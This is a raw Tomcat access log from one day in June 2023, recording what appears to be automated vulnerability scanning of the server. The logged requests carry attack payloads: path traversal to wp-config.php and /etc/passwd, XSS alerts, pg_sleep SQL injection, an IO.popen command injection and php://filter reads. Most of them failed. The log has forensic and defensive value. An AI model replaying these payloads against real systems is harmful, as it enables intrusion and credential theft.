Current File : //usr/local/tomcat8/logs/localhost_access_log.2023-06-17.txt
107.189.31.184 - - [17/Jun/2023:00:00:31 +0530] "GET /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php HTTP/1.1" 404 1120
107.189.31.184 - - [17/Jun/2023:00:00:33 +0530] "GET /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php HTTP/1.1" 404 1120
107.189.31.184 - - [17/Jun/2023:00:02:22 +0530] "GET /2RHotvbhYN16vO4bLn5d5iBeByZ HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:00:02:23 +0530] "GET /2RHotvbhYN16vO4bLn5d5iBeByZ HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:00:02:45 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:00:02:45 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:00:03:16 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:00:03:16 +0530] "GET null null" 400 -
45.128.232.141 - - [17/Jun/2023:00:04:28 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:00:08:18 +0530] "POST /public/checklogin.htm HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:00:08:18 +0530] "POST /public/checklogin.htm HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:00:08:35 +0530] "GET /install/froxlor.sql HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:00:08:35 +0530] "GET /install/froxlor.sql HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:00:12:21 +0530] "GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1" 404 1140
107.189.31.184 - - [17/Jun/2023:00:12:22 +0530] "GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1" 404 1140
107.189.31.184 - - [17/Jun/2023:00:12:47 +0530] "POST /api/graphql HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:00:12:47 +0530] "POST /api/graphql HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:00:14:07 +0530] "GET /monitoring HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:00:14:08 +0530] "GET /monitoring HTTP/1.1" 404 1014
90.151.171.106 - - [17/Jun/2023:00:14:33 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:00:14:33 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:00:14:33 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:00:14:33 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:00:14:38 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:00:14:38 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:00:14:38 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:00:14:38 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:00:18:24 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:00:18:24 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:00:18:37 +0530] "GET /mod/lti/auth.php?redirect_uri=javascript:alert('2RHotzt4nmdSm0tYG4DWow1ylHu') HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:00:18:37 +0530] "GET /mod/lti/auth.php?redirect_uri=javascript:alert('2RHotzt4nmdSm0tYG4DWow1ylHu') HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:00:18:54 +0530] "GET /log/system.log HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:00:18:56 +0530] "GET /log/system.log HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:00:18:57 +0530] "GET /log/vpn.log HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:00:18:59 +0530] "GET /log/vpn.log HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:00:19:00 +0530] "GET /log/access.log HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:00:19:02 +0530] "GET /log/access.log HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:00:19:03 +0530] "GET /log/warn.log HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:00:19:05 +0530] "GET /log/warn.log HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:00:19:06 +0530] "GET /log/error.log HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:00:19:08 +0530] "GET /log/error.log HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:00:19:09 +0530] "GET /log/debug.log HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:00:19:11 +0530] "GET /log/debug.log HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:00:19:11 +0530] "GET /log/mobile.log HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:00:19:11 +0530] "GET /showfile.php?file=/etc/passwd HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:00:19:12 +0530] "GET /showfile.php?file=/etc/passwd HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:00:19:13 +0530] "GET /log/mobile.log HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:00:19:14 +0530] "GET /log/firewall.log HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:00:19:16 +0530] "GET /log/firewall.log HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:00:19:53 +0530] "GET /_ignition/health-check HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:00:19:54 +0530] "GET /_ignition/health-check HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:00:22:28 +0530] "POST /viewlog.jsp HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:00:22:28 +0530] "POST /viewlog.jsp HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:00:22:59 +0530] "POST /Side.php HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:00:23:00 +0530] "POST /Side.php HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:00:24:25 +0530] "GET /goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:00:24:26 +0530] "GET /goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:00:24:48 +0530] "GET /ajax.php?entriesPerPage=15&f=getPipelineJobOrder&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&sortBy=dateCreatedInt&sortDirection=desc HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:00:24:49 +0530] "GET /ajax.php?entriesPerPage=15&f=getPipelineJobOrder&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&sortBy=dateCreatedInt&sortDirection=desc HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:00:32:30 +0530] "POST /classes/Master.php?f=delete_request HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:00:32:31 +0530] "POST /classes/Master.php?f=delete_request HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:00:33:30 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:00:33:30 +0530] "GET /ftpsync.settings HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:00:33:31 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:00:33:31 +0530] "GET /ftpsync.settings HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:00:33:33 +0530] "GET /wp-content/uploads/workreap-temp/2RHotzweGaNTphVO7ShnlRBoLvw.php HTTP/1.1" 404 1122
107.189.31.184 - - [17/Jun/2023:00:33:34 +0530] "GET /wp-content/uploads/workreap-temp/2RHotzweGaNTphVO7ShnlRBoLvw.php HTTP/1.1" 404 1122
107.189.31.184 - - [17/Jun/2023:00:33:57 +0530] "GET /index.action?redirect:http://www.interact.sh/ HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:00:33:58 +0530] "GET /index.action?redirect:http://www.interact.sh/ HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:00:35:08 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:00:35:08 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:00:37:27 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:00:37:27 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:00:41:09 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:00:41:09 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:00:41:20 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:00:41:21 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:00:41:27 +0530] "GET /api/search/attribute?tf_version=%27+and+(select%20pg_sleep(10))+ISNULL--&versionid=* HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:00:41:28 +0530] "GET /api/search/attribute?tf_version=%27+and+(select%20pg_sleep(10))+ISNULL--&versionid=* HTTP/1.1" 404 1034
190.112.206.61 - - [17/Jun/2023:00:41:35 +0530] "GET / HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:00:41:41 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:00:41:41 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:00:41:41 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:00:41:41 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:00:41:46 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:00:41:46 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:00:41:46 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:00:41:46 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:00:43:09 +0530] "GET /test.txt HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:00:43:09 +0530] "GET /test.txt HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:00:44:12 +0530] "POST /login.html HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:00:44:13 +0530] "POST /login.html HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:00:44:22 +0530] "GET /wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported HTTP/1.1" 404 1154
107.189.31.184 - - [17/Jun/2023:00:44:22 +0530] "GET /wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported HTTP/1.1" 404 1154
107.189.31.184 - - [17/Jun/2023:00:48:00 +0530] "GET /mobile/index.php HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:00:48:01 +0530] "GET /mobile/index.php HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:00:48:02 +0530] "POST /invoker/JMXInvokerServlet/ HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:00:48:03 +0530] "POST /invoker/JMXInvokerServlet/ HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:00:48:04 +0530] "POST /invoker/EJBInvokerServlet/ HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:00:48:05 +0530] "POST /invoker/EJBInvokerServlet/ HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:00:48:06 +0530] "POST /invoker/readonly HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:00:48:07 +0530] "POST /invoker/readonly HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:00:48:50 +0530] "GET /../../../../../../../../windows/win.ini HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:00:48:51 +0530] "GET /../../../../../../../../windows/win.ini HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:00:49:15 +0530] "GET /whoAmI/ HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:00:49:15 +0530] "GET /whoAmI/ HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:00:49:17 +0530] "GET /whoAmI/ HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:00:49:17 +0530] "GET /whoAmI/ HTTP/1.1" 404 1008
87.120.88.58 - - [17/Jun/2023:00:50:22 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:00:51:07 +0530] "GET /examples/servlets/servlet/CookieExample HTTP/1.1" 200 658
107.189.31.184 - - [17/Jun/2023:00:51:07 +0530] "GET /examples/servlets/servlet/CookieExample HTTP/1.1" 200 658
107.189.31.184 - - [17/Jun/2023:00:51:08 +0530] "GET /transmission/web/ HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:00:51:09 +0530] "GET /transmission/web/ HTTP/1.1" 404 1028
45.156.128.7 - - [17/Jun/2023:00:51:52 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
87.120.88.59 - - [17/Jun/2023:00:52:37 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:00:54:06 +0530] "GET /eam/vib?id=/etc/passwd HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:00:54:08 +0530] "GET /eam/vib?id=/etc/passwd HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:01:01:17 +0530] "POST /wp-admin/admin-post.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:01:01:17 +0530] "POST /wp-admin/admin-post.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:01:02:48 +0530] "GET /components/com_ionfiles/download.php?download=1&file=../../../../../../../../etc/passwd HTTP/1.1" 404 1066
107.189.31.184 - - [17/Jun/2023:01:02:49 +0530] "GET /components/com_ionfiles/download.php?download=1&file=../../../../../../../../etc/passwd HTTP/1.1" 404 1066
107.189.31.184 - - [17/Jun/2023:01:06:30 +0530] "GET /interlib/report/ShowImage?localPath=etc/passwd HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:01:06:30 +0530] "GET /interlib/report/ShowImage?localPath=etc/passwd HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:01:06:32 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:01:06:33 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:01:08:04 +0530] "GET /index.php?%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&action=Login&module=Users&print=a HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:01:08:05 +0530] "GET /index.php?%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&action=Login&module=Users&print=a HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:01:11:06 +0530] "GET /api/config HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:01:11:06 +0530] "GET /api/config HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:01:11:44 +0530] "GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:01:11:44 +0530] "GET /WealthT24/GetImage?docDownloadPath=/etc/passwd HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:01:11:45 +0530] "GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:01:11:46 +0530] "GET /WealthT24/GetImage?docDownloadPath=/etc/passwd HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:01:11:47 +0530] "GET /WealthT24/GetImage?docDownloadPath=c:/windows/win.ini HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:01:11:48 +0530] "GET /WealthT24/GetImage?docDownloadPath=c:/windows/win.ini HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:01:12:45 +0530] "GET /api/v1/database/1 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:12:48 +0530] "GET /api/v1/database/2 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:12:51 +0530] "GET /api/v1/database/3 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:12:54 +0530] "GET /api/v1/database/4 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:12:56 +0530] "GET /api/v1/database/5 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:12:58 +0530] "GET /nagiosxi/install.php HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:01:12:58 +0530] "GET /api/v1/database/6 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:12:58 +0530] "GET /nagiosxi/install.php HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:01:13:00 +0530] "GET /api/v1/database/7 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:03 +0530] "GET /api/v1/database/9 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:04 +0530] "GET /api/v1/database/1 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:06 +0530] "GET /api/v1/database/10 HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:01:13:06 +0530] "GET /api/v1/database/2 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:08 +0530] "GET /api/v1/database/1 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:10 +0530] "GET /api/v1/database/3 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:11 +0530] "GET /api/v1/database/2 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:12 +0530] "GET /api/v1/database/4 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:13 +0530] "GET /api/v1/database/3 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:15 +0530] "GET /api/v1/database/5 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:15 +0530] "GET /api/v1/database/4 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:18 +0530] "GET /api/v1/database/6 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:18 +0530] "GET /api/v1/database/5 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:21 +0530] "GET /api/v1/database/7 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:21 +0530] "GET /api/v1/database/6 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:24 +0530] "GET /api/v1/database/7 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:24 +0530] "GET /api/v1/database/9 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:27 +0530] "GET /api/v1/database/9 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:27 +0530] "GET /api/v1/database/10 HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:01:13:30 +0530] "GET /api/v1/database/10 HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:01:13:30 +0530] "GET /api/v1/database/1 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:33 +0530] "GET /api/v1/database/2 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:33 +0530] "GET /api/v1/database/1 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:36 +0530] "GET /api/v1/database/2 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:36 +0530] "GET /api/v1/database/3 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:39 +0530] "GET /api/v1/database/3 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:39 +0530] "GET /api/v1/database/4 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:42 +0530] "GET /api/v1/database/4 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:42 +0530] "GET /api/v1/database/5 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:45 +0530] "GET /api/v1/database/6 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:45 +0530] "GET /api/v1/database/5 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:47 +0530] "GET /api/v1/database/7 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:48 +0530] "GET /api/v1/database/6 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:50 +0530] "GET /api/v1/database/9 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:51 +0530] "GET /api/v1/database/7 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:53 +0530] "GET /api/v1/database/10 HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:01:13:53 +0530] "GET /api/v1/database/9 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:56 +0530] "GET /api/v1/database/10 HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:01:13:56 +0530] "GET /api/v1/database/1 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:58 +0530] "GET /api/v1/database/1 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:13:58 +0530] "GET /api/v1/database/2 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:01 +0530] "GET /api/v1/database/2 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:01 +0530] "GET /api/v1/database/3 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:03 +0530] "GET /api/v1/database/4 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:03 +0530] "GET /api/v1/database/3 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:06 +0530] "GET /api/v1/database/5 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:06 +0530] "GET /api/v1/database/4 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:08 +0530] "GET /api/v1/database/6 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:09 +0530] "GET /api/v1/database/5 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:11 +0530] "GET /api/v1/database/7 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:11 +0530] "GET /api/v1/database/6 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:13 +0530] "GET /api/v1/database/7 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:13 +0530] "GET /api/v1/database/9 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:15 +0530] "GET /api/v1/database/10 HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:01:14:15 +0530] "GET /api/v1/database/9 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:17 +0530] "GET /api/v1/database/1 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:17 +0530] "GET /api/v1/database/10 HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:01:14:19 +0530] "GET /api/v1/database/2 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:20 +0530] "GET /api/v1/database/1 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:22 +0530] "GET /api/v1/database/3 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:23 +0530] "GET /api/v1/database/2 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:25 +0530] "GET /api/v1/database/4 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:26 +0530] "GET /api/v1/database/3 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:28 +0530] "GET /api/v1/database/5 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:29 +0530] "GET /api/v1/database/4 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:31 +0530] "GET /api/v1/database/6 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:32 +0530] "GET /api/v1/database/5 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:34 +0530] "GET /api/v1/database/6 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:34 +0530] "GET /api/v1/database/7 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:34 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:01:14:34 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:01:14:36 +0530] "GET /api/v1/database/7 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:37 +0530] "GET /api/v1/database/9 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:38 +0530] "GET /api/v1/database/9 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:40 +0530] "GET /api/v1/database/10 HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:01:14:41 +0530] "GET /api/v1/database/10 HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:01:14:43 +0530] "GET /api/v1/database/1 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:46 +0530] "GET /api/v1/database/2 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:49 +0530] "GET /api/v1/database/3 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:52 +0530] "GET /api/v1/database/4 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:54 +0530] "GET /api/v1/database/5 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:57 +0530] "GET /api/v1/database/6 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:14:59 +0530] "GET /api/v1/database/7 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:15:02 +0530] "GET /api/v1/database/9 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:01:15:04 +0530] "GET /api/v1/database/10 HTTP/1.1" 404 1030
90.151.171.106 - - [17/Jun/2023:01:15:08 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:01:15:08 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:01:15:13 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:01:15:13 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:01:15:18 +0530] "GET /ip.php?Z70629657371Q1 HTTP/1.1" 404 1006
90.151.171.106 - - [17/Jun/2023:01:15:18 +0530] "GET /ip.php?Z78909657371Q1 HTTP/1.1" 404 1006
90.151.171.106 - - [17/Jun/2023:01:15:23 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:01:15:23 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:01:17:24 +0530] "GET /admin/login/index.php HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:01:17:25 +0530] "GET /admin/login/index.php HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:01:17:45 +0530] "GET /dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:01:17:48 +0530] "GET /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1066
107.189.31.184 - - [17/Jun/2023:01:17:51 +0530] "GET /lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:01:17:54 +0530] "GET /includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 404 1046
